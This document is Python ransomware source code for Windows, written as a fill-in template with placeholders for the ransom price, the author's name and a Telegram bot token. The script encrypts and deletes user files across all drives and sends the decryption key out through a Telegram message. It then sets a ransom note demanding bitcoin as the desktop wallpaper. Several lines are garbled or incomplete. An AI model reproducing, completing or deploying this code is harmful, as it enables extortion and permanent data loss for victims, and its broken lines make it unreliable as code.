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import threading, ctypes, pathlib, nacl, tkinter

import cryptography, os, requests, sys, nacl.secret
from PIL import Image, ImageDraw, ImageFont
from win32api import GetSystemMetrics
from tkinter import messagebox
from time import sleep

class D_E_ncrypt(object): # Encrypter Class (Our main Class )

def __init__(self, Target=0, BoxM=0, Url=0):

self.Target = Target # File Path

self.BoxM = BoxM # Our Box Moudle
self.Url = Url # Our Api Url in my case Telegram

def FileE(loc): # We Pass File Name And Path In Hare In Order To Encrypt Them
print(f"FILE -> {loc.Target}")
try: # Run Try/Except So We Dont Run in to Error
if (os.path.isdir(loc.Target) != True) : # Cheak If Its File not Directory

with open(loc.Target, "rb") as File: # Opeing File

Date = # Reading File & Saving it In tmp Var

FileName = loc.Target # File name

Encrypted = loc.BoxM.encrypt(Date) # Encrypting tmp Var

if(loc.Target != sys.argv[0]): # If Target File is not Our own script Do this

with open(f"{FileName}.lol","wb") as File: # Opeing File To write File
print(f"FILE -> {FileName}") # Printing File name for batter Debug
File.write(Encrypted) # Writeing The File
os.remove(loc.Target) # Removing OG File
except Exception as e:print(f"Error -> {e}")
def SendKey(Key): # We Pass Decrypt Key and Api url To Make Get request
requests.get(Key.Url) # We send request

User = os.getlogin() # Getting Username

Script = sys.argv[0] # Getting Our Script name
MaxThread = 120 # Setting up Our max Number of Thread
AdminRight = ctypes.windll.shell32.IsUserAnAdmin() # Cheaking for admin Perms

Key = nacl.utils.random(nacl.secret.SecretBox.KEY_SIZE) # Making A key IN order to D/Encypt with it

Box = nacl.secret.SecretBox(Key) # Our Safe box Moudle that we use to Decrypte

Token = "Your Telegram Token So you can Get Decrypt The Files!" # Our Api Token
NumID = "Your User ID so Bot just Send Key To You !" # Our User ID

Message = (f"{User} -> {Key}") # Makeing Prefix for Massges

PathList = [r"C:\Users\\"] # You can add more Paths hare if you went

for Latter in range(97,123): (PathList.append(f"{chr(Latter)}:\\")) # Making list of A,Z in order to pass as Drive to our path list
PathList.remove("c:\\") # Removing C Drive

print(f"list -> {PathList}") # Remove This line this is just for Debuging
print(f"We are -> {Script}") # Remove This line this is just for Debuging
print(f"Key - > {Key}") # Remove This line this is just for Debuging

def OneStart():

try: # Run Try/Except So We Dont Run in to Error

HttpReq = D_E_ncrypt(Url=f"{Token}/sendMessage?chat_id={NumID}&text={Message}")
threading.Thread(target=HttpReq.SendKey, args=()).start() # Making HttpReq Moudle And Runnig it In a Thread

Img ='RGB', (GetSystemMetrics(0), GetSystemMetrics(1)), color = (0, 0, 0)) # Getting Window Heihgt & Weight To Make Background

Canvas= ImageDraw.Draw(Img) # Drawing Image

font = ImageFont.truetype("arial", int(GetSystemMetrics(1)/20)) # Getting Right Font Size
(10,10), (r"""
Your data Is encrypted In order to Get your
> date back Send me (YOUR PRICE USD) in BTC to this Wellt
> and then email me for your key
> GoodLuck :)
> ~ YOUR NAME """),
fill=(255,0,0),font=font) # Write Text On Image'Bg.png') # Save Image as bg.png

ctypes.windll.user32.SystemParametersInfoW(20, 0, f'{os.getcwd()}\\Bg.png' , 0) # Set New Background Up


def CallErrorBox(): # Making Simple Error Box in Tk

WINDOW = tkinter.Tk() # Making Tk Window

WINDOW.withdraw() # Destroying Tk Window
messagebox.showerror("Error", "Try To Re-Run As Administrator")

if __name__ == '__main__': # Check IF Script IS Excuted By User.

if(AdminRight): # Check IF Script Have Admin Access
OneStart() # Run On start Def To Send HttpReq
for AllFiles in PathList:
try: # Run Try/Except So We Dont Run in to Error & background
if (pathlib.Path(AllFiles).exists()): # Cheak if Path Exist

for path, subdirs, files in os.walk(AllFiles): # For All Drives & Files

if("$Recycle.Bin" in path):pass # Skip Junks

elif("c:\\Windows" in path):pass # Skip c:\\Windows
elif("\\AppData\\" in path):pass # Skip \AppData\
elif("System32" in path):pass # Skip System32

else: # After That

for name in files: # For Files in Folder

FilePath = os.path.join(path, name) # Join File path to File Name

FileSize = os.stat(FilePath).st_size # Get The File Size

if(".dll" in name ):pass # Skip This File Format

elif(".exe" in name ):pass # Skip This File Format
elif(".msn" in name ):pass # Skip This File Format

else :

if (FileSize >= 50000000 ): # If File size is More then 50mb make Thread for this file
while True: # Make While Ture
if len(threading.enumerate()) < MaxThread: # IF your Worker List is Free

EncrypterObj = D_E_ncrypt(FilePath, Box) # Pass in file name And key

threading.Thread(target=EncrypterObj.FileE, args=()).start() # to Encypte.

break # Break Out

else: sleep(0.2) # Sleep for 0.2 Sec Until Spot Get Free
else :
print(FilePath) # Remove This line this is just for Debuging
D_E_ncrypt(FilePath, Box).FileE() # Pass In File Name And key
except Exception as e:print(f"Error -> {e}") # remove Print And Replace Ut With Pass
CallErrorBox() # Call Error Box

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